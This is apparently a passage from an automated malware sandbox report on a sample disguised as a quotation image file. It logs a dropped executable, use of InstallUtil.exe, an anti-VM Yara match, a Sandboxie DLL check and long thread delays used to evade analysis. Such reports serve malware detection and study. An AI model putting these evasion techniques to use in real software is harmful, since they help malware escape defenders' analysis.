                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: RFQ____RM quotation_JPEG IMAGE.img.exe PID: 3148, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 5332, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Gydvapkca.exe PID: 6716, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: RFQ____RM quotation_JPEG IMAGE.img.exe, 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Gydvapkca.exe, 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory allocated: 13D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: 2210000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: 23A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: 43A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 10F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4C80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: 24F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: 2610000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\Gydvapkca.exeMemory allocated: 4610000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 900000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 28E0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 10E0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599542Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598467Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598357Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597810Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595951Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594422Jump to behavior
